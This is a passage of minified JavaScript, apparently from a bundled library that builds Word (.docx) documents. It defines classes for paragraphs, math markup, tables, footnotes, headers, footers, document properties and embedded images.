dc(Ce.spacing)),Ce.indent&&this.push(new ue(Ce.indent)),void 0!==Ce.contextualSpacing&&this.push(new l("w:contextualSpacing",Ce.contextualSpacing)),Ce.alignment&&this.push(new X(Ce.alignment)),void 0!==Ce.outlineLevel&&this.push(new Uu(Ce.outlineLevel)),void 0!==Ce.suppressLineNumbers&&this.push(new l("w:suppressLineNumbers",Ce.suppressLineNumbers))}push(Ce){this.root.push(Ce)}prepForXml(Ce){if(Ce.viewWrapper instanceof uo)for(const nt of this.numberingReferences)Ce.file.Numbering.createConcreteNumberingInstance(nt.reference,nt.instance);return super.prepForXml(Ce)}}class uc extends E{constructor(Ce){if(super("w:p"),"string"==typeof Ce)return this.properties=new ml({}),this.root.push(this.properties),this.root.push(new vt(Ce)),this;if(this.properties=new ml(Ce),this.root.push(this.properties),Ce.text&&this.root.push(new vt(Ce.text)),Ce.children)for(const nt of Ce.children)if(nt instanceof a_){this.root.push(nt.start);for(const Dt of nt.children)this.root.push(Dt);this.root.push(nt.end)}else this.root.push(nt)}prepForXml(Ce){for(const nt of this.root)if(nt instanceof Wt){const Dt=this.root.indexOf(nt),di=new qd(nt.options.children,(0,ua.EL)());Ce.viewWrapper.Relationships.createRelationship(di.linkId,"http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink",nt.options.link,ti.EXTERNAL),this.root[Dt]=di}return super.prepForXml(Ce)}addRunToFront(Ce){return this.root.splice(1,0,Ce),this}}class gr extends E{constructor(Ce){super("m:oMath");for(const nt of Ce.children)this.root.push(nt)}}class s0 extends E{constructor(Ce){super("m:t"),this.root.push(Ce)}}class PM extends E{constructor(Ce){super("m:r"),this.root.push(new s0(Ce))}}class c0 extends E{constructor(Ce){super("m:den");for(const nt of Ce)this.root.push(nt)}}class ju extends E{constructor(Ce){super("m:num");for(const nt of Ce)this.root.push(nt)}}class OM extends E{constructor(Ce){super("m:f"),this.root.push(new ju(Ce.numerator)),this.root.push(new c0(Ce.denominator))}}class U2 extends b{constructor(){super(...arguments),this.xmlKeys={accent:"m:val"}}}class l0 extends E{constructor(Ce){super("m:chr"),this.root.push(new U2({accent:Ce}))}}class hc extends E{constructor(Ce){super("m:e");for(const nt of Ce)this.root.push(nt)}}class q2 extends b{constructor(){super(...arguments),this.xmlKeys={value:"m:val"}}}class d0 extends E{constructor(){super("m:limLoc"),this.root.push(new q2({value:"undOvr"}))}}class G2 extends b{constructor(){super(...arguments),this.xmlKeys={hide:"m:val"}}}class j2 extends E{constructor(){super("m:subHide"),this.root.push(new G2({hide:1}))}}class Q2 extends b{constructor(){super(...arguments),this.xmlKeys={hide:"m:val"}}}class NM extends E{constructor(){super("m:supHide"),this.root.push(new Q2({hide:1}))}}class Ef extends E{constructor(Ce,nt,Dt){super("m:naryPr"),this.root.push(new l0(Ce)),this.root.push(new d0),nt||this.root.push(new NM),Dt||this.root.push(new j2)}}class Df extends E{constructor(Ce){super("m:sub");for(const nt of Ce)this.root.push(nt)}}class xf extends E{constructor(Ce){super("m:sup");for(const nt of Ce)this.root.push(nt)}}class m0 extends E{constructor(Ce){super("m:nary"),this.root.push(new Ef("\u2211",!!Ce.superScript,!!Ce.subScript)),Ce.subScript&&this.root.push(new Df(Ce.subScript)),Ce.superScript&&this.root.push(new xf(Ce.superScript)),this.root.push(new hc(Ce.children))}}class r_ extends E{constructor(){super("m:sSupPr")}}class wf extends E{constructor(Ce){super("m:sSup"),this.root.push(new r_),this.root.push(new hc(Ce.children)),this.root.push(new xf(Ce.superScript))}}class $2 extends E{constructor(){super("m:sSubPr")}}class LM extends E{constructor(Ce){super("m:sSub"),this.root.push(new $2),this.root.push(new hc(Ce.children)),this.root.push(new Df(Ce.subScript))}}class K2 extends E{constructor(){super("m:sSubSupPr")}}class Qd extends E{constructor(Ce){super("m:sSubSup"),this.root.push(new K2),this.root.push(new hc(Ce.children)),this.root.push(new Df(Ce.subScript)),this.root.push(new xf(Ce.superScript))}}class u0 extends E{constructor(){super("m:sPrePr")}}class sa extends E{constructor(Ce){super("m:sPre"),this.root.push(new u0),this.root.push(new hc(Ce.children)),this.root.push(new Df(Ce.subScript)),this.root.push(new xf(Ce.superScript))}}const h0="";class f0 extends E{constructor(Ce){if(super("m:deg"),Ce)for(const nt of Ce)this.root.push(nt)}}class If extends b{constructor(){super(...arguments),this.xmlKeys={hide:"m:val"}}}class p0 extends E{constructor(){super("m:degHide"),this.root.push(new If({hide:1}))}}class s_ extends E{constructor(Ce){super("m:radPr"),Ce||this.root.push(new p0)}}class X2 extends E{constructor(Ce){super("m:rad"),this.root.push(new s_(!!Ce.degree)),this.root.push(new f0(Ce.degree)),this.root.push(new hc(Ce.children))}}class Rf extends E{constructor(Ce){super("m:fName");for(const nt of Ce)this.root.push(nt)}}class Qu extends E{constructor(){super("m:funcPr")}}class fc extends E{constructor(Ce){super("m:func"),this.root.push(new Qu),this.root.push(new Rf(Ce.name)),this.root.push(new hc(Ce.children))}}class c_ extends b{constructor(){super(...arguments),this.xmlKeys={character:"m:val"}}}class Y2 extends E{constructor(Ce){super("m:begChr"),this.root.push(new c_({character:Ce}))}}class l_ extends b{constructor(){super(...arguments),this.xmlKeys={character:"m:val"}}}class Sf extends E{constructor(Ce){super("m:endChr"),this.root.push(new l_({character:Ce}))}}class d_ extends E{constructor(Ce){super("m:dPr"),Ce&&(this.root.push(new Y2(Ce.beginningCharacter)),this.root.push(new Sf(Ce.endingCharacter)))}}class Ar extends E{constructor(Ce){super("m:d"),this.root.push(new d_),this.root.push(new hc(Ce.children))}}class J2 extends E{constructor(Ce){super("m:d"),this.root.push(new d_({beginningCharacter:"[",endingCharacter:"]"})),this.root.push(new hc(Ce.children))}}class zM extends E{constructor(Ce){super("m:d"),this.root.push(new d_({beginningCharacter:"{",endingCharacter:"}"})),this.root.push(new hc(Ce.children))}}class $d extends E{constructor(Ce){super("m:d"),this.root.push(new d_({beginningCharacter:"\u2329",endingCharacter:"\u232a"})),this.root.push(new hc(Ce.children))}}class pc extends E{constructor(Ce){super("w:tblGrid");for(const nt of Ce)this.root.push(new m_(nt))}}class Z2 extends b{constructor(){super(...arguments),this.xmlKeys={w:"w:w"}}}class m_ extends E{constructor(Ce){super("w:gridCol"),void 0!==Ce&&this.root.push(new Z2({w:(0,z.Jd)(Ce)}))}}var Nc,us,$u,Um;!function(Se){Se.AUTO="auto",Se.DXA="dxa",Se.NIL="nil",Se.PERCENTAGE="pct"}(Nc||(Nc={}));class eC extends b{constructor(){super(...arguments),this.xmlKeys={type:"w:type",size:"w:w"}}}class Rs extends E{constructor(Ce,{type:nt=Nc.AUTO,size:Dt}){super(Ce);let di=Dt;nt===Nc.PERCENTAGE&&"number"==typeof Dt&&(di=`${Dt}%`),this.root.push(new eC({type:nt,size:(0,z.aB)(di)}))}}!function(Se){Se.TABLE="w:tblCellMar",Se.TABLE_CELL="w:tcMar"}(us||(us={}));class u_ extends g{constructor(Ce,{marginUnitType:nt=Nc.DXA,top:Dt,left:di,bottom:pi,right:Hi}){super(Ce),void 0!==Dt&&this.root.push(new Rs("w:top",{type:nt,size:Dt})),void 0!==di&&this.root.push(new Rs("w:left",{type:nt,size:di})),void 0!==pi&&this.root.push(new Rs("w:bottom",{type:nt,size:pi})),void 0!==Hi&&this.root.push(new Rs("w:right",{type:nt,size:Hi}))}}class rd extends g{constructor(Ce){super("w:tcBorders"),Ce.top&&this.root.push(new L("w:top",Ce.top)),Ce.start&&this.root.push(new L("w:start",Ce.start)),Ce.left&&this.root.push(new L("w:left",Ce.left)),Ce.bottom&&this.root.push(new L("w:bottom",Ce.bottom)),Ce.end&&this.root.push(new L("w:end",Ce.end)),Ce.right&&this.root.push(new L("w:right",Ce.right))}}class Ua extends b{constructor(){super(...arguments),this.xmlKeys={val:"w:val"}}}class h_ extends E{constructor(Ce){super("w:gridSpan"),this.root.push(new Ua({val:(0,z.vH)(Ce)}))}}!function(Se){Se.CONTINUE="continue",Se.RESTART="restart"}($u||($u={}));class tC extends b{constructor(){super(...arguments),this.xmlKeys={val:"w:val"}}}class f_ extends E{constructor(Ce){super("w:vMerge"),this.root.push(new tC({val:Ce}))}}!function(Se){Se.BOTTOM_TO_TOP_LEFT_TO_RIGHT="btLr",Se.LEFT_TO_RIGHT_TOP_TO_BOTTOM="lrTb",Se.TOP_TO_BOTTOM_RIGHT_TO_LEFT="tbRl"}(Um||(Um={}));class iC extends b{constructor(){super(...arguments),this.xmlKeys={val:"w:val"}}}class kf extends E{constructor(Ce){super("w:textDirection"),this.root.push(new iC({val:Ce}))}}class Ku extends g{constructor(Ce){super("w:tcPr"),Ce.width&&this.root.push(new Rs("w:tcW",Ce.width)),Ce.columnSpan&&this.root.push(new h_(Ce.columnSpan)),Ce.verticalMerge?this.root.push(new f_(Ce.verticalMerge)):Ce.rowSpan&&Ce.rowSpan>1&&this.root.push(new f_($u.RESTART)),Ce.borders&&this.root.push(new rd(Ce.borders)),Ce.shading&&this.root.push(new me(Ce.shading)),Ce.margins&&this.root.push(new u_(us.TABLE_CELL,Ce.margins)),Ce.textDirection&&this.root.push(new kf(Ce.textDirection)),Ce.verticalAlign&&this.root.push(new ur(Ce.verticalAlign))}}class p_ extends E{constructor(Ce){super("w:tc"),this.options=Ce,this.root.push(new Ku(Ce));for(const nt of Ce.children)this.root.push(nt)}prepForXml(Ce){return this.root[this.root.length-1]instanceof uc||this.root.push(new uc({})),super.prepForXml(Ce)}}const qm={style:U.NONE,size:0,color:"auto"},bi={style:U.SINGLE,size:4,color:"auto"};class Rn extends E{constructor(Ce){super("w:tblBorders"),this.root.push(new L("w:top",Ce.top?Ce.top:bi)),this.root.push(new L("w:left",Ce.left?Ce.left:bi)),this.root.push(new L("w:bottom",Ce.bottom?Ce.bottom:bi)),this.root.push(new L("w:right",Ce.right?Ce.right:bi)),this.root.push(new L("w:insideH",Ce.insideHorizontal?Ce.insideHorizontal:bi)),this.root.push(new L("w:insideV",Ce.insideVertical?Ce.insideVertical:bi))}}var be,Pf,Kd,_c,Xu,Yu,__;Rn.NONE={top:qm,bottom:qm,left:qm,right:qm,insideHorizontal:qm,insideVertical:qm},function(Se){Se.NEVER="never",Se.OVERLAP="overlap"}(be||(be={}));class Me extends b{constructor(){super(...arguments),this.xmlKeys={val:"w:val"}}}class nr extends E{constructor(Ce){super("w:tblOverlap"),this.root.push(new Me({val:Ce}))}}(function(Se){Se.MARGIN="margin",Se.PAGE="page",Se.TEXT="text"})(Pf||(Pf={})),function(Se){Se.CENTER="center",Se.INSIDE="inside",Se.LEFT="left",Se.OUTSIDE="outside",Se.RIGHT="right"}(Kd||(Kd={})),function(Se){Se.CENTER="center",Se.INSIDE="inside",Se.BOTTOM="bottom",Se.OUTSIDE="outside",Se.INLINE="inline",Se.TOP="top"}(_c||(_c={}));class _0 extends b{constructor(){super(...arguments),this.xmlKeys={horizontalAnchor:"w:horzAnchor",verticalAnchor:"w:vertAnchor",absoluteHorizontalPosition:"w:tblpX",relativeHorizontalPosition:"w:tblpXSpec",absoluteVerticalPosition:"w:tblpY",relativeVerticalPosition:"w:tblpYSpec",bottomFromText:"w:bottomFromText",topFromText:"w:topFromText",leftFromText:"w:leftFromText",rightFromText:"w:rightFromText"}}}class aC extends E{constructor(Ce){var{leftFromText:nt,rightFromText:Dt,topFromText:di,bottomFromText:pi,absoluteHorizontalPosition:Hi,absoluteVerticalPosition:pa}=Ce,Ya=function(ca,ka){var Dr={};for(var Ao in ca)Object.prototype.hasOwnProperty.call(ca,Ao)&&ka.indexOf(Ao)<0&&(Dr[Ao]=ca[Ao]);if(null!=ca&&"function"==typeof Object.getOwnPropertySymbols){var rr=0;for(Ao=Object.getOwnPropertySymbols(ca);rr<Ao.length;rr++)ka.indexOf(Ao[rr])<0&&Object.prototype.propertyIsEnumerable.call(ca,Ao[rr])&&(Dr[Ao[rr]]=ca[Ao[rr]])}return Dr}(Ce,["leftFromText","rightFromText","topFromText","bottomFromText","absoluteHorizontalPosition","absoluteVerticalPosition"]);super("w:tblpPr"),this.root.push(new _0(Object.assign({leftFromText:void 0===nt?void 0:(0,z.Jd)(nt),rightFromText:void 0===Dt?void 0:(0,z.Jd)(Dt),topFromText:void 0===di?void 0:(0,z.Jd)(di),bottomFromText:void 0===pi?void 0:(0,z.Jd)(pi),absoluteHorizontalPosition:void 0===Hi?void 0:(0,z.xb)(Hi),absoluteVerticalPosition:void 0===pa?void 0:(0,z.xb)(pa)},Ya))),Ya.overlap&&this.root.push(new nr(Ya.overlap))}}!function(Se){Se.AUTOFIT="autofit",Se.FIXED="fixed"}(Xu||(Xu={}));class g0 extends b{constructor(){super(...arguments),this.xmlKeys={type:"w:type"}}}class hs extends E{constructor(Ce){super("w:tblLayout"),this.root.push(new g0({type:Ce}))}}class ul extends g{constructor(Ce){super("w:tblPr"),Ce.style&&this.root.push(new A("w:tblStyle",Ce.style)),Ce.float&&this.root.push(new aC(Ce.float)),void 0!==Ce.visuallyRightToLeft&&this.root.push(new l("w:bidiVisual",Ce.visuallyRightToLeft)),Ce.width&&this.root.push(new Rs("w:tblW",Ce.width)),Ce.alignment&&this.root.push(new X(Ce.alignment)),Ce.indent&&this.root.push(new Rs("w:tblInd",Ce.indent)),Ce.borders&&this.root.push(new Rn(Ce.borders)),Ce.shading&&this.root.push(new me(Ce.shading)),Ce.layout&&this.root.push(new hs(Ce.layout)),Ce.cellMargin&&this.root.push(new u_(us.TABLE,Ce.cellMargin))}}class C0 extends E{constructor({rows:Ce,width:nt,columnWidths:Dt=Array(Math.max(...Ce.map(Ao=>Ao.CellCount))).fill(100),margins:di,indent:pi,float:Hi,layout:pa,style:Ya,borders:ca,alignment:ka,visuallyRightToLeft:Dr}){super("w:tbl"),this.root.push(new ul({borders:null!=ca?ca:{},width:null!=nt?nt:{size:100},indent:pi,float:Hi,layout:pa,style:Ya,alignment:ka,cellMargin:di,visuallyRightToLeft:Dr})),this.root.push(new pc(Dt));for(const Ao of Ce)this.root.push(Ao);Ce.forEach((Ao,rr)=>{if(rr===Ce.length-1)return;let Wc=0;Ao.cells.forEach(At=>{if(At.options.rowSpan&&At.options.rowSpan>1){const gc=new p_({rowSpan:At.options.rowSpan-1,columnSpan:At.options.columnSpan,borders:At.options.borders,children:[],verticalMerge:$u.CONTINUE});Ce[rr+1].addCellToColumnIndex(gc,Wc)}Wc+=At.options.columnSpan||1})})}}!function(Se){Se.AUTO="auto",Se.ATLEAST="atLeast",Se.EXACT="exact"}(Yu||(Yu={}));class sd extends b{constructor(){super(...arguments),this.xmlKeys={value:"w:val",rule:"w:hRule"}}}class hl extends E{constructor(Ce,nt){super("w:trHeight"),this.root.push(new sd({value:(0,z.Jd)(Ce),rule:nt}))}}class y0 extends g{constructor(Ce){super("w:trPr"),void 0!==Ce.cantSplit&&this.root.push(new l("w:cantSplit",Ce.cantSplit)),void 0!==Ce.tableHeader&&this.root.push(new l("w:tblHeader",Ce.tableHeader)),Ce.height&&this.root.push(new hl(Ce.height.value,Ce.height.rule))}}class b0 extends E{constructor(Ce){super("w:tr"),this.options=Ce,this.root.push(new y0(Ce));for(const nt of Ce.children)this.root.push(nt)}get CellCount(){return this.options.children.length}get cells(){return this.root.filter(Ce=>Ce instanceof p_)}addCellToIndex(Ce,nt){this.root.splice(nt+1,0,Ce)}addCellToColumnIndex(Ce,nt){const Dt=this.columnIndexToRootIndex(nt,!0);this.addCellToIndex(Ce,Dt-1)}rootIndexToColumnIndex(Ce){if(Ce<1||Ce>=this.root.length)throw new Error("cell 'rootIndex' should between 1 to "+(this.root.length-1));let nt=0;for(let Dt=1;Dt<Ce;Dt++)nt+=this.root[Dt].options.columnSpan||1;return nt}columnIndexToRootIndex(Ce,nt=!1){if(Ce<0)throw new Error("cell 'columnIndex' should not less than zero");let Dt=0,di=1;for(;Dt<=Ce;){if(di>=this.root.length){if(nt)return this.root.length;throw new Error("cell 'columnIndex' should not great than "+(Dt-1))}const pi=this.root[di];di+=1,Dt+=pi&&pi.options.columnSpan||1}return di-1}}class Gm extends b{constructor(){super(...arguments),this.xmlKeys={xmlns:"xmlns",vt:"xmlns:vt"}}}class nC extends E{constructor(){super("Properties"),this.root.push(new Gm({xmlns:"http://schemas.openxmlformats.org/officeDocument/2006/extended-properties",vt:"http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"}))}}class g_ extends b{constructor(){super(...arguments),this.xmlKeys={xmlns:"xmlns"}}}class Of extends b{constructor(){super(...arguments),this.xmlKeys={contentType:"ContentType",extension:"Extension"}}}class cd extends E{constructor(Ce,nt){super("Default"),this.root.push(new Of({contentType:Ce,extension:nt}))}}class C_ extends b{constructor(){super(...arguments),this.xmlKeys={contentType:"ContentType",partName:"PartName"}}}class Lc extends E{constructor(Ce,nt){super("Override"),this.root.push(new C_({contentType:Ce,partName:nt}))}}class M0 extends E{constructor(){super("Types"),this.root.push(new g_({xmlns:"http://schemas.openxmlformats.org/package/2006/content-types"})),this.root.push(new cd("image/png","png")),this.root.push(new cd("image/jpeg","jpeg")),this.root.push(new cd("image/jpeg","jpg")),this.root.push(new cd("image/bmp","bmp")),this.root.push(new cd("image/gif","gif")),this.root.push(new cd("application/vnd.openxmlformats-package.relationships+xml","rels")),this.root.push(new cd("application/xml","xml")),this.root.push(new Lc("application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml","/word/document.xml")),this.root.push(new Lc("application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml","/word/styles.xml")),this.root.push(new Lc("application/vnd.openxmlformats-package.core-properties+xml","/docProps/core.xml")),this.root.push(new Lc("application/vnd.openxmlformats-officedocument.custom-properties+xml","/docProps/custom.xml")),this.root.push(new Lc("application/vnd.openxmlformats-officedocument.extended-properties+xml","/docProps/app.xml")),this.root.push(new Lc("application/vnd.openxmlformats-officedocument.wordprocessingml.numbering+xml","/word/numbering.xml")),this.root.push(new Lc("application/vnd.openxmlformats-officedocument.wordprocessingml.footnotes+xml","/word/footnotes.xml")),this.root.push(new Lc("application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml","/word/settings.xml")),this.root.push(new Lc("application/vnd.openxmlformats-officedocument.wordprocessingml.comments+xml","/word/comments.xml"))}addFooter(Ce){this.root.push(new Lc("application/vnd.openxmlformats-officedocument.wordprocessingml.footer+xml",`/word/footer${Ce}.xml`))}addHeader(Ce){this.root.push(new Lc("application/vnd.openxmlformats-officedocument.wordprocessingml.header+xml",`/word/header${Ce}.xml`))}}class y_ extends E{constructor(Ce){super("cp:coreProperties"),this.root.push(new ko({cp:"http://schemas.openxmlformats.org/package/2006/metadata/core-properties",dc:"http://purl.org/dc/elements/1.1/",dcterms:"http://purl.org/dc/terms/",dcmitype:"http://purl.org/dc/dcmitype/",xsi:"http://www.w3.org/2001/XMLSchema-instance"})),Ce.title&&this.root.push(new P("dc:title",Ce.title)),Ce.subject&&this.root.push(new P("dc:subject",Ce.subject)),Ce.creator&&this.root.push(new P("dc:creator",Ce.creator)),Ce.keywords&&this.root.push(new P("cp:keywords",Ce.keywords)),Ce.description&&this.root.push(new P("dc:description",Ce.description)),Ce.lastModifiedBy&&this.root.push(new P("cp:lastModifiedBy",Ce.lastModifiedBy)),Ce.revision&&this.root.push(new P("cp:revision",String(Ce.revision))),this.root.push(new b_("dcterms:created")),this.root.push(new b_("dcterms:modified"))}}class b_ extends E{constructor(Ce){super(Ce),this.root.push(new ko({type:"dcterms:W3CDTF"})),this.root.push((0,z.sF)(new Date))}}class v0 extends b{constructor(){super(...arguments),this.xmlKeys={xmlns:"xmlns",vt:"xmlns:vt"}}}class A0 extends b{constructor(){super(...arguments),this.xmlKeys={fmtid:"fmtid",pid:"pid",name:"name"}}}class Tr extends E{constructor(Ce,nt){super("property"),this.root.push(new A0({fmtid:"{D5CDD505-2E9C-101B-9397-08002B2CF9AE}",pid:Ce.toString(),name:nt.name})),this.root.push(new M_(nt.value))}}class M_ extends E{constructor(Ce){super("vt:lpwstr"),this.root.push(Ce)}}class oC extends E{constructor(Ce){super("Properties"),this.properties=[],this.root.push(new v0({xmlns:"http://schemas.openxmlformats.org/officeDocument/2006/custom-properties",vt:"http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"})),this.nextId=2;for(const nt of Ce)this.addCustomProperty(nt)}prepForXml(Ce){return this.properties.forEach(nt=>this.root.push(nt)),super.prepForXml(Ce)}addCustomProperty(Ce){this.properties.push(new Tr(this.nextId++,Ce))}}class rC extends b{constructor(){super(...arguments),this.xmlKeys={wpc:"xmlns:wpc",mc:"xmlns:mc",o:"xmlns:o",r:"xmlns:r",m:"xmlns:m",v:"xmlns:v",wp14:"xmlns:wp14",wp:"xmlns:wp",w10:"xmlns:w10",w:"xmlns:w",w14:"xmlns:w14",w15:"xmlns:w15",wpg:"xmlns:wpg",wpi:"xmlns:wpi",wne:"xmlns:wne",wps:"xmlns:wps",cp:"xmlns:cp",dc:"xmlns:dc",dcterms:"xmlns:dcterms",dcmitype:"xmlns:dcmitype",xsi:"xmlns:xsi",type:"xsi:type"}}}class Ss extends S{constructor(Ce,nt){super("w:ftr",nt),this.refId=Ce,nt||this.root.push(new rC({wpc:"http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas",mc:"http://schemas.openxmlformats.org/markup-compatibility/2006",o:"urn:schemas-microsoft-com:office:office",r:"http://schemas.openxmlformats.org/officeDocument/2006/relationships",m:"http://schemas.openxmlformats.org/officeDocument/2006/math",v:"urn:schemas-microsoft-com:vml",wp14:"http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing",wp:"http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing",w10:"urn:schemas-microsoft-com:office:word",w:"http://schemas.openxmlformats.org/wordprocessingml/2006/main",w14:"http://schemas.microsoft.com/office/word/2010/wordml",w15:"http://schemas.microsoft.com/office/word/2012/wordml",wpg:"http://schemas.microsoft.com/office/word/2010/wordprocessingGroup",wpi:"http://schemas.microsoft.com/office/word/2010/wordprocessingInk",wne:"http://schemas.microsoft.com/office/word/2006/wordml",wps:"http://schemas.microsoft.com/office/word/2010/wordprocessingShape"}))}get ReferenceId(){return this.refId}add(Ce){this.root.push(Ce)}}class fl{constructor(Ce,nt,Dt){this.media=Ce,this.footer=new Ss(nt,Dt),this.relationships=new Hm}add(Ce){this.footer.add(Ce)}addChildElement(Ce){this.footer.addChildElement(Ce)}get View(){return this.footer}get Relationships(){return this.relationships}get Media(){return this.media}}class or extends b{constructor(){super(...arguments),this.xmlKeys={type:"w:type",id:"w:id"}}}class fi extends E{constructor(){super("w:footnoteRef")}}class sC extends pt{constructor(){super({style:"FootnoteReference"}),this.root.push(new fi)}}!function(Se){Se.SEPERATOR="separator",Se.CONTINUATION_SEPERATOR="continuationSeparator"}(__||(__={}));class ln extends E{constructor(Ce){super("w:footnote"),this.root.push(new or({type:Ce.type,id:Ce.id}));for(let nt=0;nt<Ce.children.length;nt++){const Dt=Ce.children[nt];0===nt&&Dt.addRunToFront(new sC),this.root.push(Dt)}}}class cC extends E{constructor(){super("w:continuationSeparator")}}class lC extends pt{constructor(){super({}),this.root.push(new cC)}}class dC extends E{constructor(){super("w:separator")}}class Ju extends pt{constructor(){super({}),this.root.push(new dC)}}class ji extends b{constructor(){super(...arguments),this.xmlKeys={wpc:"xmlns:wpc",mc:"xmlns:mc",o:"xmlns:o",r:"xmlns:r",m:"xmlns:m",v:"xmlns:v",wp14:"xmlns:wp14",wp:"xmlns:wp",w10:"xmlns:w10",w:"xmlns:w",w14:"xmlns:w14",w15:"xmlns:w15",wpg:"xmlns:wpg",wpi:"xmlns:wpi",wne:"xmlns:wne",wps:"xmlns:wps",Ignorable:"mc:Ignorable"}}}class Zu extends E{constructor(){super("w:footnotes"),this.root.push(new ji({wpc:"http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas",mc:"http://schemas.openxmlformats.org/markup-compatibility/2006",o:"urn:schemas-microsoft-com:office:office",r:"http://schemas.openxmlformats.org/officeDocument/2006/relationships",m:"http://schemas.openxmlformats.org/officeDocument/2006/math",v:"urn:schemas-microsoft-com:vml",wp14:"http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing",wp:"http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing",w10:"urn:schemas-microsoft-com:office:word",w:"http://schemas.openxmlformats.org/wordprocessingml/2006/main",w14:"http://schemas.microsoft.com/office/word/2010/wordml",w15:"http://schemas.microsoft.com/office/word/2012/wordml",wpg:"http://schemas.microsoft.com/office/word/2010/wordprocessingGroup",wpi:"http://schemas.microsoft.com/office/word/2010/wordprocessingInk",wne:"http://schemas.microsoft.com/office/word/2006/wordml",wps:"http://schemas.microsoft.com/office/word/2010/wordprocessingShape",Ignorable:"w14 w15 wp14"}));const Ce=new ln({id:-1,type:__.SEPERATOR,children:[new uc({spacing:{after:0,line:240,lineRule:qt.AUTO},children:[new Ju]})]});this.root.push(Ce);const nt=new ln({id:0,type:__.CONTINUATION_SEPERATOR,children:[new uc({spacing:{after:0,line:240,lineRule:qt.AUTO},children:[new lC]})]});this.root.push(nt)}createFootNote(Ce,nt){const Dt=new ln({id:Ce,children:nt});this.root.push(Dt)}}class v_{constructor(){this.footnotess=new Zu,this.relationships=new Hm}get View(){return this.footnotess}get Relationships(){return this.relationships}}class Nf extends b{constructor(){super(...arguments),this.xmlKeys={wpc:"xmlns:wpc",mc:"xmlns:mc",o:"xmlns:o",r:"xmlns:r",m:"xmlns:m",v:"xmlns:v",wp14:"xmlns:wp14",wp:"xmlns:wp",w10:"xmlns:w10",w:"xmlns:w",w14:"xmlns:w14",w15:"xmlns:w15",wpg:"xmlns:wpg",wpi:"xmlns:wpi",wne:"xmlns:wne",wps:"xmlns:wps",cp:"xmlns:cp",dc:"xmlns:dc",dcterms:"xmlns:dcterms",dcmitype:"xmlns:dcmitype",xsi:"xmlns:xsi",type:"xsi:type",cx:"xmlns:cx",cx1:"xmlns:cx1",cx2:"xmlns:cx2",cx3:"xmlns:cx3",cx4:"xmlns:cx4",cx5:"xmlns:cx5",cx6:"xmlns:cx6",cx7:"xmlns:cx7",cx8:"xmlns:cx8",w16cid:"xmlns:w16cid",w16se:"xmlns:w16se"}}}class pl extends S{constructor(Ce,nt){super("w:hdr",nt),this.refId=Ce,nt||this.root.push(new Nf({wpc:"http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas",mc:"http://schemas.openxmlformats.org/markup-compatibility/2006",o:"urn:schemas-microsoft-com:office:office",r:"http://schemas.openxmlformats.org/officeDocument/2006/relationships",m:"http://schemas.openxmlformats.org/officeDocument/2006/math",v:"urn:schemas-microsoft-com:vml",wp14:"http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing",wp:"http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing",w10:"urn:schemas-microsoft-com:office:word",w:"http://schemas.openxmlformats.org/wordprocessingml/2006/main",w14:"http://schemas.microsoft.com/office/word/2010/wordml",w15:"http://schemas.microsoft.com/office/word/2012/wordml",wpg:"http://schemas.microsoft.com/office/word/2010/wordprocessingGroup",wpi:"http://schemas.microsoft.com/office/word/2010/wordprocessingInk",wne:"http://schemas.microsoft.com/office/word/2006/wordml",wps:"http://schemas.microsoft.com/office/word/2010/wordprocessingShape",cx:"http://schemas.microsoft.com/office/drawing/2014/chartex",cx1:"http://schemas.microsoft.com/office/drawing/2015/9/8/chartex",cx2:"http://schemas.microsoft.com/office/drawing/2015/10/21/chartex",cx3:"http://schemas.microsoft.com/office/drawing/2016/5/9/chartex",cx4:"http://schemas.microsoft.com/office/drawing/2016/5/10/chartex",cx5:"http://schemas.microsoft.com/office/drawing/2016/5/11/chartex",cx6:"http://schemas.microsoft.com/office/drawing/2016/5/12/chartex",cx7:"http://schemas.microsoft.com/office/drawing/2016/5/13/chartex",cx8:"http://schemas.microsoft.com/office/drawing/2016/5/14/chartex",w16cid:"http://schemas.microsoft.com/office/word/2016/wordml/cid",w16se:"http://schemas.microsoft.com/office/word/2015/wordml/symex"}))}get ReferenceId(){return this.refId}add(Ce){this.root.push(Ce)}}class _l{constructor(Ce,nt,Dt){this.media=Ce,this.header=new pl(nt,Dt),this.relationships=new Hm}add(Ce){return this.header.add(Ce),this}addChildElement(Ce){this.header.addChildElement(Ce)}get View(){return this.header}get Relationships(){return this.relationships}get Media(){return this.media}}class ld{constructor(){this.map=new Map}addMedia(Ce,nt){const Dt=`${(0,ua.EL)()}.png`,di={stream:"string"==typeof Ce?this.convertDataURIToBinary(Ce):Ce,fileName:Dt,transformation:{pixels:{x:Math.round(nt.width),y:Math.round(nt.height)},emus:{x:Math.round(9525*nt.width),y:Math.round(9525*nt.height)},flip:nt.flip,rotation:nt.rotation?6e4*nt.rotation:void 0}};return this.map.set(Dt,di),di}addImage(Ce,nt){this.map.set(Ce,nt)}get Array(){return Array.from(this.map.values())}convertDataURIToBinary(Ce){const nt=";base64,",Dt=Ce.indexOf(nt)+nt.length;return"function"==typeof atob?new Uint8Array(atob(Ce.substring(Dt)).split("").map(di=>di.charCodeAt(0))):new(ae(8764).Buffer)(Ce,"base64")}}const eh="";var ks,Xd;!function(Se){Se.BULLET="bullet",Se.CARDINAL_TEXT="cardinalText",Se.CHICAGO="chicago",Se.DECIMAL="decimal",Se.DECIMAL_ENCLOSED_CIRCLE="decimalEnclosedCircle",Se.DECIMAL_ENCLOSED_FULLSTOP="decimalEnclosedFullstop",Se.DECIMAL_ENCLOSED_PARENTHESES="decimalEnclosedParen",Se.DECIMAL_ZERO="decimalZero",Se.LOWER_LETTER="lowerLetter",Se.LOWER_ROMAN="lowerRoman",Se.NONE="none",Se.ORDINAL_TEXT="ordinalText",Se.UPPER_LETTER="upperLetter",Se.UPPER_ROMAN="upperRoman"}(ks||(ks={}));class A_ extends 